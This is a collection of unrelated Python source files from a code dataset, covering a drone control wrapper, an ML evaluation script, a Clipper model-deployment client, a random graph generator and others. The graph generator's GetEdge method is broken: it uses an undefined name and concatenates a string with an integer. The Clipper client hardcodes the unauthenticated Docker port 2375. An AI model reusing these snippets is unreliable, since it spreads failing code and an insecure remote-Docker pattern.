return self.send_command('flip r', with_return)
def flip_forward(self, with_return=False):
"""
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('flip f', with_return)
def flip_backward(self, with_return=False):
"""
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('flip b', with_return)
def goto(self, x, y, z, speed, with_return=False):
"""
param x: int, [20, 500]
param y: int, [20, 500]
param z: int, [20, 500]
param speed: int, [10-100]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('go {} {} {} {}'.format(x, y, z, speed), with_return)
def goto_curve(self, x1, y1, z1, x2, y2, z2, speed, with_return=False):
"""fly a curve defined by (0, 0, 0), (x1, y1, z1), (x2, y2, z2) with speed
param x1, x2: int, [-500, 500]
param y1, y2: int, [-500, 500]
param z1, z2: int, [-500, 500]
param speed: int, [10-60]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed), with_return)
def set_speed(self, speed, with_return=False):
"""
param speed: int, [10-100]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('speed {}'.format(speed), with_return)
def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity, with_return=False):
"""
param left_right_velocity: int, [-100, 100]
param forward_backward_velocity: int, [-100, 100]
param up_down_velocity: int, [-100, 100]
param rotate_velocity: int, [-100, 100]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('rc {} {} {} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity), with_return)
def get(self, command, split=False):
"""
param command
param split: bool, multiple values?
return: int or list(int)
"""
result = self.send_command(command)
if split:
return [int(x) for x in result.split(' ')]
else:
return int(result)
def get_speed(self):
"""
return: int, [10, 100]
"""
return self.get('speed?')
def get_battery(self):
"""
return: int, [0, 100]
"""
return self.get('battery?')
def get_flight_time(self):
"""
return: int
"""
return self.get('time?')
def get_relative_height(self):
"""
return: int, [10, 3000]
"""
return self.get('height?')
def get_temperature(self):
"""
return: int, [0, 90]
"""
return self.get('temp?')
def get_imu_pose(self):
"""[pitch, roll, yaw]
return: list(int), [[-89, 89], [-179, 179], [-179, 179]]
"""
return self.get('attitude?', split=True)
def get_absolute_height(self):
"""
return: int
"""
return self.get('baro?')
def get_imu_acceleration(self):
"""
return: list(int)
"""
return self.get('acceleration?', split=True)
def get_tof_height(self):
"""
return: int, [10, 400]; 6553: out of bounds
"""
return self.get('tof?')
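# Illustrative usage (added sketch, not part of the original module; requires a Tello reachable at 192.168.10.1):
#   tello = Tello(state=True, video=False)
#   tello.take_off()
#   tello.move_forward(50)
#   print(tello.get_battery())
#   tello.land()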
| 3.1875 | 3 |
terrascript/resource/sematext.py | mjuenema/python-terrascript | 507 | 1230 | <filename>terrascript/resource/sematext.py
# terrascript/resource/sematext.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:26:36 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.resource.sematext
#
# instead of
#
# >>> import terrascript.resource.sematext.sematext
#
# This is only available for 'official' and 'partner' providers.
from terrascript.resource.sematext.sematext import *
| 1.21875 | 1 |
eval_encoder.py | lithium0003/Image2UTF8-Transformer | 0 | 1231 | #!/usr/bin/env python3
import tensorflow as tf
physical_devices = tf.config.list_physical_devices('GPU')
try:
tf.config.experimental.set_memory_growth(physical_devices[0], True)
except:
# Invalid device or cannot modify virtual devices once initialized.
pass
import numpy as np
import os, time, csv
import tqdm
import umap
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import datetime
import signal
import net
from matplotlib import rcParams
rcParams['font.family'] = 'sans-serif'
rcParams['font.sans-serif'] = ['Hiragino Maru Gothic Pro', 'Yu Gothic', 'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto Sans CJK JP']
import net
class SimpleEncodeDecoder:
def __init__(self):
self.save_dir = './result/step1/'
self.result_dir = './result/plot/'
os.makedirs(self.result_dir, exist_ok=True)
checkpoint_dir = self.save_dir
self.max_epoch = 300
self.steps_per_epoch = 1000
self.batch_size = 64
lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5)
self.optimizer = tf.keras.optimizers.Adam(lr)
self.encoder = net.FeatureBlock()
self.encoder.summary()
self.decoder = net.SimpleDecoderBlock()
self.decoder.summary()
inputs = {
'image': tf.keras.Input(shape=(128,128,3)),
}
feature_out = self.encoder(inputs)
outputs = self.decoder(feature_out)
self.model = tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder')
checkpoint = tf.train.Checkpoint(optimizer=self.optimizer,
model=self.model)
last = tf.train.latest_checkpoint(checkpoint_dir)
checkpoint.restore(last)
self.manager = tf.train.CheckpointManager(
checkpoint, directory=checkpoint_dir, max_to_keep=2)
if not last is None:
self.init_epoch = int(os.path.basename(last).split('-')[1])
print('loaded %d epoch'%self.init_epoch)
else:
self.init_epoch = 0
self.model.summary()
def eval(self):
self.data = net.FontData()
print("Plot: ", self.init_epoch + 1)
acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1))
print('acc', acc)
@tf.function
def eval_substep(self, inputs):
input_data = {
'image': inputs['input'],
}
feature = self.encoder(input_data)
outputs = self.decoder(feature)
target_id = inputs['index']
target_id1 = inputs['idx1']
target_id2 = inputs['idx2']
pred_id1 = tf.nn.softmax(outputs['id1'], -1)
pred_id2 = tf.nn.softmax(outputs['id2'], -1)
return {
'feature': feature,
'pred_id1': pred_id1,
'pred_id2': pred_id2,
'target_id': target_id,
'target_id1': target_id1,
'target_id2': target_id2,
}
def make_plot(self, test_ds, epoch):
result = []
labels = []
with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt:
correct_count = 0
failed_count = 0
with tqdm.tqdm(total=len(self.data.test_keys)) as pbar:
for inputs in test_ds:
pred = self.eval_substep(inputs)
result += [pred['feature']]
labels += [pred['target_id']]
for i in range(pred['target_id1'].shape[0]):
txt.write('---\n')
target = pred['target_id'][i].numpy()
txt.write('target: id %d = %s\n'%(target, self.data.glyphs[target-1]))
predid1 = np.argmax(pred['pred_id1'][i])
predid2 = np.argmax(pred['pred_id2'][i])
predid = predid1 * 100 + predid2
if predid == 0:
txt.write('predict: id %d nothing (p=%f)\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2]))
elif predid > self.data.id_count + 1:
txt.write('predict: id %d nothing (p=%f)\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2]))
else:
txt.write('predict: id %d = %s (p=%f)\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2]))
if target == predid:
txt.write('Correct!\n')
correct_count += 1
else:
txt.write('Failed!\n')
failed_count += 1
pbar.update(1)
acc = correct_count / (correct_count + failed_count)
txt.write('==============\n')
txt.write('Correct = %d\n'%correct_count)
txt.write('Failed = %d\n'%failed_count)
txt.write('accuracy = %f\n'%acc)
result = np.concatenate(result)
labels = np.concatenate(labels)
print('run UMAP')
X_reduced = umap.UMAP(metric='cosine').fit_transform(result)
fig, ax = plt.subplots(figsize=(50, 50))
ax.scatter(X_reduced[:, 0], X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv'))
print('plot UMAP')
for i, label in enumerate(labels):
ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1]))
plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300)
plt.close('all')
return acc
def eval():
encoder = SimpleEncodeDecoder()
encoder.eval()
if __name__ == '__main__':
eval()
| 2.0625 | 2 |
clipper_admin/clipper_admin/clipper_admin.py | SimonZsx/clipper | 2 | 1232 | from __future__ import absolute_import, division, print_function
import logging
import docker
import tempfile
import requests
from requests.exceptions import RequestException
import json
import pprint
import time
import re
import os
import tarfile
import sys
from cloudpickle import CloudPickler
import pickle
import numpy as np
from google.protobuf.json_format import MessageToDict
if sys.version_info < (3, 0):
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
PY3 = False
else:
from io import BytesIO as StringIO
PY3 = True
import grpc
from .rpc import model_pb2_grpc
from .rpc import model_pb2
from .rpc import prediction_pb2_grpc
from .rpc import prediction_pb2
from .rpc import management_pb2
from .rpc import management_pb2_grpc
from .container_manager import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter
from .exceptions import ClipperException, UnconnectedException
from .version import __version__, __registry__
from . import graph_parser
DEFAULT_LABEL = []
DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432
CLIPPER_TEMP_DIR = "/tmp/clipper" # Used Internally for Test; Not Windows Compatible
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%y-%m-%d:%H:%M:%S',
level=logging.INFO)
# logging.basicConfig(
# format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
# datefmt='%y-%m-%d:%H:%M:%S',
# level=logging.INFO)
logger = logging.getLogger(__name__)
deploy_regex_str = "[a-z0-9]([-a-z0-9]*[a-z0-9])?\Z"
deployment_regex = re.compile(deploy_regex_str)
def _validate_versioned_model_name(name, version):
if deployment_regex.match(name) is None:
raise ClipperException(
"Invalid value: {name}: a model name must be a valid DNS-1123 "
" subdomain. It must consist of lower case "
"alphanumeric characters, '-' or '.', and must start and end with "
"an alphanumeric character (e.g. 'example.com', regex used for "
"validation is '{reg}'".format(name=name, reg=deploy_regex_str))
if deployment_regex.match(version) is None:
raise ClipperException(
"Invalid value: {version}: a model version must be a valid DNS-1123 "
" subdomain. It must consist of lower case "
"alphanumeric characters, '-' or '.', and must start and end with "
"an alphanumeric character (e.g. 'example.com', regex used for "
"validation is '{reg}'".format(
version=version, reg=deploy_regex_str))
class ClipperConnection(object):
def __init__(self, container_manager):
self.connected = False
self.cm = container_manager
#############TEST################
self.runtime_dag = ""
self.lock = False
#################################
self.logger = ClusterAdapter(logger, {
'cluster_name': self.cm.cluster_identifier
})
def start_clipper(self,
mgmt_frontend_image='{}/management_frontend:{}'.format(
__registry__, __version__),
cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES):
try:
self.cm.start_clipper(mgmt_frontend_image)
# while True:
# try:
# query_frontend_url = "http://{host}/metrics".format(
# host=self.cm.get_query_addr())
# mgmt_frontend_url = "http://{host}/admin/ping".format(
# host=self.cm.get_admin_addr())
# for name, url in [('query frontend', query_frontend_url),
# ('management frontend', mgmt_frontend_url)]:
# r = requests.get(url, timeout=5)
# if r.status_code != requests.codes.ok:
# raise RequestException(
# "{name} end point {url} health check failed".format(name=name, url=url))
# break
# except RequestException as e:
# self.logger.info("Clipper still initializing: \n {}".format(e))
# time.sleep(1)
self.logger.info("Clipper is running")
self.connected = True
except ClipperException as e:
self.logger.warning("Error starting Clipper: {}".format(e.msg))
raise e
def connect(self):
"""Connect to a running Clipper cluster."""
self.cm.connect()
self.connected = True
self.logger.info(
"Successfully connected to Clipper cluster at {}".format(
self.cm.get_query_addr()))
def build_and_deploy_DAG(self,
name,
version,
dag_description,
labels):
if not self.connected:
raise UnconnectedException()
def build_and_deploy_model(self,
name,
version,
input_type,
model_data_path,
base_image,
labels=None,
container_registry=None,
num_replicas=1,
batch_size=-1,
pkgs_to_install=None):
if not self.connected:
raise UnconnectedException()
image = self.build_model(name, version, model_data_path, base_image,
container_registry, pkgs_to_install)
self.deploy_model(name, version, input_type, image, labels,
num_replicas, batch_size)
def build_model(self,
name,
version,
model_data_path,
base_image,
container_registry=None,
pkgs_to_install=None):
version = str(version)
_validate_versioned_model_name(name, version)
run_cmd = ''
if pkgs_to_install:
run_as_lst = 'RUN apt-get -y install build-essential && pip install'.split(
' ')
run_cmd = ' '.join(run_as_lst + pkgs_to_install)
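        # The build context assembled below corresponds to a Dockerfile of roughly this shape
        # (illustrative; the concrete values come from the caller's arguments):
        #   FROM <base_image>
        #   RUN apt-get -y install build-essential && pip install <pkgs_to_install...>
        #   COPY <model_data_path> /model/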
with tempfile.NamedTemporaryFile(
mode="w+b", suffix="tar") as context_file:
# Create build context tarfile
with tarfile.TarFile(
fileobj=context_file, mode="w") as context_tar:
context_tar.add(model_data_path)
# From https://stackoverflow.com/a/740854/814642
try:
df_contents = StringIO(
str.encode(
"FROM {container_name}\n{run_command}\nCOPY {data_path} /model/\n".
format(
container_name=base_image,
data_path=model_data_path,
run_command=run_cmd)))
df_tarinfo = tarfile.TarInfo('Dockerfile')
df_contents.seek(0, os.SEEK_END)
df_tarinfo.size = df_contents.tell()
df_contents.seek(0)
context_tar.addfile(df_tarinfo, df_contents)
except TypeError:
df_contents = StringIO(
"FROM {container_name}\n{run_command}\nCOPY {data_path} /model/\n".
format(
container_name=base_image,
data_path=model_data_path,
run_command=run_cmd))
df_tarinfo = tarfile.TarInfo('Dockerfile')
df_contents.seek(0, os.SEEK_END)
df_tarinfo.size = df_contents.tell()
df_contents.seek(0)
context_tar.addfile(df_tarinfo, df_contents)
# Exit Tarfile context manager to finish the tar file
# Seek back to beginning of file for reading
context_file.seek(0)
image = "{cluster}-{name}:{version}".format(
cluster=self.cm.cluster_identifier, name=name, version=version)
if container_registry is not None:
image = "{reg}/{image}".format(
reg=container_registry, image=image)
docker_client = docker.from_env()
self.logger.info(
"Building model Docker image with model data from {}".format(
model_data_path))
image_result, build_logs = docker_client.images.build(
fileobj=context_file, custom_context=True, tag=image)
for b in build_logs:
if 'stream' in b and b['stream'] != '\n': #log build steps only
self.logger.info(b['stream'].rstrip())
self.logger.info("Pushing model Docker image to {}".format(image))
for line in docker_client.images.push(repository=image, stream=True):
self.logger.debug(line)
return image
def deploy_model(self,
name,
version,
input_type,
image,
labels=None,
num_replicas=1,
batch_size=-1):
if not self.connected:
raise UnconnectedException()
version = str(version)
_validate_versioned_model_name(name, version)
self.cm.deploy_model(
name=name,
version=version,
input_type=input_type,
image=image,
num_replicas=num_replicas)
# self.register_model(
# name,
# version,
# input_type,
# image=image,
# labels=labels,
# batch_size=batch_size)
self.logger.info("Done deploying model {name}:{version}.".format(
name=name, version=version))
def connect_host(self, host_ip, host_port):
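        # Note: the Docker daemon port is hardcoded to "2375" below; the host_port argument is currently unused.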
self.cm.connect_host(host_ip, "2375")
def add_model(self,
model_name,
model_version,
image,
input_type="string",
output_type="string",
stateful=False):
modelinfo = management_pb2.ModelInfo(modelname=model_name,
modelversion=model_version,
image=image,
inputtype=input_type,
outputtype=output_type,
stateful=stateful).SerializeToString()
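        # The serialized ModelInfo is passed as a CLI argument to a one-shot gRPC client container,
        # which forwards it to the admin endpoint at the hardcoded host/port below.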
self.cm.grpc_client("zsxhku/grpcclient", "--addmodel %s %s %s "%("localhost","33333", modelinfo))
return
def deploy_DAG(self, name, version, dag_description=None, runtime=""):
if not self.connected:
raise UnconnectedException()
# model_info = self.get_all_models()
dag_description_ = dag_description
#self.logger.info("dag_description: %s"%(dag_description_))
#if(dag_description==None):
# dag_description_=self.get_dag_description()
nodes_list = graph_parser.get_all_nodes(dag_description_)
container_info = []
proxy_info = []
backup_info = []
count = 1
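        # For every node of the parsed DAG: start a model replica, attach a sidecar proxy on the
        # same host, then register the model instance with its proxy over gRPC. Stateful nodes
        # additionally get a backup replica + proxy pair.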
for model_info in nodes_list:
model_name,model_version,model_image = graph_parser.get_name_version(model_info)
container_name, container_id, host = self.cm.add_replica(model_name, model_version, "22222", model_image, runtime=runtime)
self.logger.info("Started %s with container %s:%s (HOST:%s)"%(model_name, container_name, container_id, host))
container_ip = self.cm.get_container_ip(host, container_id)
proxy_name, proxy_id = self.cm.set_proxy("mxschen/ai-proxy:latest", container_name, container_ip, host)
## get the ip of the instances
proxy_ip = self.cm.get_container_ip(host, proxy_id)
proxy_info.append([proxy_name,proxy_id,proxy_ip])
container_info.append([container_name, container_id, container_ip])
if graph_parser.is_stateful(model_info):
backup_name, backup_id, backup_host = self.cm.add_replica(model_name, model_version, "22222", model_image)
self.logger.info("[Backup] Started %s with container %s:%s (HOST:%s)"%(model_name, backup_name, backup_id, backup_host))
backup_ip = self.cm.get_container_ip(backup_host, backup_id)
backup_proxy_name, backup_proxy_id = self.cm.set_proxy("mxschen/ai-proxy:latest", backup_name, backup_ip, backup_host)
backup_proxy_ip= self.cm.get_container_ip(backup_host, backup_proxy_id)
backup_info.append([backup_name, backup_id, backup_ip, backup_proxy_name, backup_proxy_id, backup_proxy_ip])
else:
backup_info.append([])
#self.cm.check_container_status(host, container_id, 0.3, 20)
#self.cm.check_container_status(host, proxy_id, 0.3, 20)
#time.sleep(25)
#self.logger.info("proxy_ip:%s"%(proxy_ip))
self.cm.grpc_client("zsxhku/grpcclient", "--setmodel %s %s %s %s %s %s"%(proxy_ip, "22223", container_name, count, container_ip, "22222" ))
self.logger.info('[DEPLOYMENT] Finished setting model info to proxy')
if(graph_parser.is_stateful(model_info)):
self.cm.grpc_client("zsxhku/grpcclient", "--setmodel %s %s %s %s %s %s"%(backup_info[-1][-1], "22223", backup_info[-1][0], count, backup_info[-1][2], "22222" ))
self.logger.info('[DEPLOYMENT][Backup] Finished setting model info to proxy')
count += 1
# self.cm.grpc_client("zsxhku/grpcclient", "--setproxy %s %s %s %s"%(container_ip, "22222", proxy_name, "22223"))
# self.logger.info('[DEPLOYMENT] Finished setting proxy info to model')
# if(graph_parser.is_stateful(model_info)):
# self.cm.grpc_client("zsxhku/grpcclient", "--setproxy %s %s %s %s"%(backup_info[-1][2], "22222", backup_info[-1][3], "22223"))
# self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy info to model')
runtime_dag_id = name+version+str(1)
## Starting frontend
frontend_name, frontend_container_id = self.cm.add_frontend("localhost", "mxschen/frontend",runtime_dag_id, proxy_info[0][2], "22223", max_workers=2048)
frontend_ip = self.cm.get_container_ip("localhost", frontend_container_id)
frontend_info = [frontend_name, frontend_container_id, frontend_ip]
self.logger.info("[DEPLOYMENT] ################ Started Frontend #################")
#expand the dag description with the model/proxy instances info
expanded_dag = graph_parser.expand_dag(dag_description_, name, version, container_info, proxy_info, backup_info, frontend_info)
self.runtime_dag = expanded_dag
# TODO: need to modularize
self.cm.grpc_client("zsxhku/grpcclient", "--addruntimedag %s %s %s %s %s %s %s"%('1', name, version, 'old' , self.cm.admin_ip, self.cm.admin_port, expanded_dag))
self.logger.info("Added new runtime DAG to admin daemon\n%s"%(expanded_dag))
#tells the proxy runtime dag info
for tup in proxy_info:
proxy_name = tup[0]
proxy_id = tup[1]
proxy_ip = tup[2]
self.cm.grpc_client("zsxhku/grpcclient", "--setdag %s %s %s"%(proxy_ip, "22223", expanded_dag))
self.logger.info('[DEPLOYMENT] Finished setting DAG for proxy {proxy_name} '.format(proxy_name=proxy_name))
#tells the backups runtime dag info
for tup in backup_info:
if tup:
self.cm.grpc_client("zsxhku/grpcclient", "--setdag %s %s %s"%(tup[-1], "22223", expanded_dag))
self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG for proxy {proxy_name} '.format(proxy_name=tup[-1]))
return
def inspect_instance(self):
"""Fetches performance metrics from the running Clipper cluster.
Returns
-------
str
The JSON string containing the current set of metrics
for this instance. On error, the string will be an error message
(not JSON formatted).
Raises
------
:py:exc:`clipper.UnconnectedException`
:py:exc:`clipper.ClipperException`
"""
def get_query_addr(self):
"""Get the IP address at which the query frontend can be reached request predictions.
Returns
-------
str
The address as an IP address or hostname.
Raises
------
:py:exc:`clipper.UnconnectedException`
"""
if not self.connected:
raise UnconnectedException()
return self.cm.get_query_addr()
def stop_models(self, model_names):
"""Stops all versions of the specified models.
This is a convenience method to avoid the need to explicitly list all versions
of a model when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`.
Parameters
----------
model_names : list(str)
A list of model names. All replicas of all versions of each model specified in the list
will be stopped.
Raises
------
:py:exc:`clipper.UnconnectedException`
"""
# if not self.connected:
# raise UnconnectedException()
# model_info = self.get_all_models(verbose=True)
# model_dict = {}
# for m in model_info:
# if m["model_name"] in model_names:
# if m["model_name"] in model_dict:
# model_dict[m["model_name"]].append(m["model_version"])
# else:
# model_dict[m["model_name"]] = [m["model_version"]]
# self.cm.stop_models(model_dict)
# pp = pprint.PrettyPrinter(indent=4)
# self.logger.info(
# "Stopped all containers for these models and versions:\n{}".format(
# pp.pformat(model_dict)))
def stop_versioned_models(self, model_versions_dict):
"""Stops the specified versions of the specified models.
Parameters
----------
        model_versions_dict : dict(str, list(str))
            For each entry in the dict, the key is a model name and the value is a list of model
            versions. All replicas for each version of each model will be stopped.
        Raises
        ------
        :py:exc:`clipper.UnconnectedException`
Note
----
This method will stop the currently deployed versions of models if you specify them. You
almost certainly want to use one of the other stop_* methods. Use with caution.
"""
# if not self.connected:
# raise UnconnectedException()
# self.cm.stop_models(model_versions_dict)
# pp = pprint.PrettyPrinter(indent=4)
# self.logger.info(
# "Stopped all containers for these models and versions:\n{}".format(
# pp.pformat(model_versions_dict)))
def stop_inactive_model_versions(self, model_names):
"""Stops all model containers serving stale versions of the specified models.
For example, if you have deployed versions 1, 2, and 3 of model "music_recommender"
and version 3 is the current version::
clipper_conn.stop_inactive_model_versions(["music_recommender"])
will stop any containers serving versions 1 and 2 but will leave containers serving
version 3 untouched.
Parameters
----------
model_names : list(str)
The names of the models whose old containers you want to stop.
Raises
------
:py:exc:`clipper.UnconnectedException`
"""
# if not self.connected:
# raise UnconnectedException()
# model_info = self.get_all_models(verbose=True)
# model_dict = {}
# for m in model_info:
# if m["model_name"] in model_names and not m["is_current_version"]:
# if m["model_name"] in model_dict:
# model_dict[m["model_name"]].append(m["model_version"])
# else:
# model_dict[m["model_name"]] = [m["model_version"]]
# self.cm.stop_models(model_dict)
# pp = pprint.PrettyPrinter(indent=4)
# self.logger.info(
# "Stopped all containers for these models and versions:\n{}".format(
# pp.pformat(model_dict)))
def stop_all_model_containers(self):
"""Stops all model containers started via Clipper admin commands.
This method can be used to clean up leftover Clipper model containers even if the
Clipper management frontend or Redis has crashed. It can also be called without calling
``connect`` first.
"""
self.cm.stop_all_model_containers()
self.logger.info("Stopped all Clipper model containers")
def stop_all(self, graceful=True):
"""Stops all processes that were started via Clipper admin commands.
This includes the query and management frontend Docker containers and all model containers.
If you started Redis independently, this will not affect Redis. It can also be called
without calling ``connect`` first.
        If graceful=False, Clipper will issue a Docker kill if it's running in Docker mode. This parameter
        has no effect in Kubernetes.
"""
self.cm.stop_all(graceful=graceful)
self.logger.info(
"Stopped all Clipper cluster and all model containers")
| 1.59375 | 2 |
graph.py | VaniSHadow/tpGenerator | 0 | 1233 | import random
import numpy
import copy
class Graph:
"""n表示图中点的个数,m表示图中边的个数"""
def __init__(self, n, m, edge_weight=1, directed=True, connected='weak', loop=False, weighted=False, trim=True):
"""
n 图中点的个数
m 图中边的个数
edge_weight 边的权值上限
directed 有向性
connected 连通性
loop 有环性
weighted 带权性
trim True:点编号从1开始 False:点编号从0开始
"""
        self.directed = directed
        self.edge_weight = edge_weight
self.weighted = weighted
self.connected = connected
self.loop = loop
self.trim = trim
        if directed==True and connected=='weak' and loop==False:  # weakly connected, directed, acyclic
self.n = n
self.m = m
self.matr = numpy.zeros((n, n))
self.topo = list(range(n))
random.shuffle(self.topo)
self.RandomGenerTopoEdges(m-(n-1))
weak_connected = self.CheckWeakConnectivity()
if weak_connected:
self.RandomGenerTopoEdges(n-1)
else:
count = 0
for i in range(n-1):
if self.matr[self.topo[i]][self.topo[i+1]]!=1:
self.matr[self.topo[i]][self.topo[i+1]]=1
count = count+1
self.RandomGenerTopoEdges(n-1-count)
self.edges = list()
for i in range(n):
for j in range(n):
if self.matr[i][j]==1:
e = (i, j)
self.edges.append(e)
"""检查图的弱连通性"""
def CheckWeakConnectivity(self):
temp = copy.deepcopy(self.matr)
for i in range(self.n):
for j in range(self.n):
if temp[i][j]==1:
temp[j][i]=1
elif temp[j][i]==1:
temp[i][j]=1
        temp = temp + numpy.eye(self.n)  # add self-loops so matrix powers capture paths of length <= n-1
        for i in range(self.n-1):
if i==0:
result = temp.dot(temp)
else:
result = result.dot(temp)
for i in range(self.n):
for j in range(self.n):
if result[i][j]==0 and i!=j:
return False
return True
"""在图中随机生成edge_num条边"""
def RandomGenerTopoEdges(self, edge_num):
for i in range(edge_num):
mid = random.randint(1, self.n-2)
st = random.randint(0, mid)
end = random.randint(mid+1, self.n-1)
while self.matr[self.topo[st]][self.topo[end]] != 0:
mid = random.randint(1, self.n-2)
st = random.randint(0, mid)
end = random.randint(mid+1, self.n-1)
self.matr[self.topo[st]][self.topo[end]] = 1
"""以字符串返回第i条边的信息"""
def GetEdge(self, i):
if self.trim:#点从1开始
if self.weighted == False:
return str(self.edges[i][0]+1) + " " + str(self.edges[i][1]+1)
else:
return str(self.edges[i][0]+1) + " " + str(self.edges[i][1]+1) + random.randint(1, edge_weight)
else:#点从0开始
if self.weighted == False:
return str(self.edges[i][0]) + " " + str(self.edges[i][1])
else:
return str(self.edges[i][0]) + " " + str(self.edges[i][1]) + random.randint(1, edge_weight)
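# --- Usage sketch (added for illustration; not part of the original module) ---
# A minimal example of driving the Graph class above. The parameter values are
# arbitrary; only the directed / weakly-connected / acyclic combination is
# handled by the constructor, so the defaults are kept here.
if __name__ == "__main__":
    g = Graph(n=6, m=9, edge_weight=10)
    for i in range(len(g.edges)):
        print(g.GetEdge(i))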
| 3.15625 | 3 |
csv2googlesheets/to_google_sheets.py | AlexSkrn/csv2googlesheets | 0 | 1234 | <filename>csv2googlesheets/to_google_sheets.py
"""This module provides a console interface to convert CSV to Google Sheets."""
from csv2googlesheets.gapi_authorization import auth_with_google
from csv2googlesheets.gapi_create_sheet import create_sheet
from csv2googlesheets.gapi_write_to_sheet import write_to_sheet
from csv2googlesheets.parse_file import build_spreadsheet_title
from csv2googlesheets.parse_file import parse_file
from csv2googlesheets.parse_cli_args import parse_cli_args
def main():
"""Control the flow of operations to write data from csv to G Sheets."""
cli_args = parse_cli_args()
values = parse_file(path=cli_args.csv)
spreadsheet_title = build_spreadsheet_title(cli_args.csv)
google_service = auth_with_google(path_creds=cli_args.credentials_json)
spreadsheet_id = create_sheet(google_service, spreadsheet_title)
write_to_sheet(
google_service,
sheet_id=spreadsheet_id,
values=values,
)
if __name__ == '__main__':
main()
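# Illustrative invocation (assumed flag names; the actual names are defined in
# parse_cli_args, which lives in a separate module):
#   python -m csv2googlesheets.to_google_sheets --csv contacts.csv --credentials_json credentials.json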
| 3.140625 | 3 |
netforce_account/netforce_account/migrations/credit_remain_cur.py | nfco/netforce | 27 | 1235 | <reponame>nfco/netforce<gh_stars>10-100
from netforce.model import get_model
from netforce import migration
from netforce import database
class Migration(migration.Migration):
_name="account.credit_remain_cur"
_version="2.5.0"
def migrate(self):
db=database.get_connection()
db.execute("UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS NULL AND amount_credit_remain IS NOT NULL")
Migration.register()
| 2.4375 | 2 |
chevah/compat/testing/testcase.py | chevah/compat | 5 | 1236 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# Copyright (c) 2011 <NAME>.
# See LICENSE for details.
"""
TestCase used for Chevah project.
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from six import text_type
from six.moves import range
import contextlib
import inspect
import threading
import os
import platform
import socket
import sys
import time
from bunch import Bunch
from mock import patch, Mock
from nose import SkipTest
try:
from twisted.internet.defer import Deferred
from twisted.internet.posixbase import (
_SocketWaker, _UnixWaker, _SIGCHLDWaker
)
from twisted.python.failure import Failure
except ImportError:
# Twisted support is optional.
_SocketWaker = None
_UnixWaker = None
_SIGCHLDWaker = None
from chevah.compat import (
DefaultAvatar,
LocalFilesystem,
process_capabilities,
system_users,
SuperAvatar,
)
from chevah.compat.administration import os_administration
from chevah.compat.testing.assertion import AssertionMixin
from chevah.compat.testing.mockup import mk
from chevah.compat.testing.constant import (
TEST_NAME_MARKER,
)
from chevah.compat.testing.filesystem import LocalTestFilesystem
# For Python below 2.7 we use the separate unittest2 module.
# It comes by default in Python 2.7.
if sys.version_info[0:2] < (2, 7):
from unittest2 import TestCase
# Shut up you linter.
TestCase
else:
from unittest import TestCase
try:
# Import reactor last in case some other modules are changing the reactor.
from twisted.internet import reactor
except ImportError:
reactor = None
def _get_hostname():
"""
Return hostname as resolved by default DNS resolver.
"""
return socket.gethostname()
class TwistedTestCase(TestCase):
"""
Test case for Twisted specific code.
Provides support for running deferred and start/stop the reactor during
tests.
"""
# Number of second to wait for a deferred to have a result.
DEFERRED_TIMEOUT = 1
# List of names for delayed calls which should not be considered as
# required to wait for them when running the reactor.
EXCEPTED_DELAYED_CALLS = []
EXCEPTED_READERS = [
_UnixWaker,
_SocketWaker,
_SIGCHLDWaker,
]
# Scheduled event to stop waiting for a deferred.
_reactor_timeout_call = None
def setUp(self):
super(TwistedTestCase, self).setUp()
self._timeout_reached = False
self._reactor_timeout_failure = None
@property
def _caller_success_member(self):
"""
        Retrieve the 'success' member from the test case.
"""
success = None
for i in range(2, 6):
try:
success = inspect.stack()[i][0].f_locals['success']
break
except KeyError:
success = None
if success is None:
raise AssertionError('Failed to find "success" attribute.')
return success
def tearDown(self):
try:
if self._caller_success_member:
# Check for a clean reactor at shutdown, only if test
# passed.
self.assertIsNone(self._reactor_timeout_failure)
self._assertReactorIsClean()
finally:
self._cleanReactor()
super(TwistedTestCase, self).tearDown()
def _reactorQueueToString(self):
"""
Return a string representation of all delayed calls from reactor
queue.
"""
result = []
for delayed in reactor.getDelayedCalls(): # noqa:cover
result.append(text_type(delayed.func))
return '\n'.join(result)
def _threadPoolQueue(self):
"""
        Return current tasks of the thread pool, or [] when the threadpool does
        not exist.
This should only be called at cleanup as it removes elements from
the Twisted thread queue, which will never be called.
"""
if not reactor.threadpool:
return []
result = []
while len(reactor.threadpool._team._pending):
result.append(reactor.threadpool._team._pending.pop())
return result
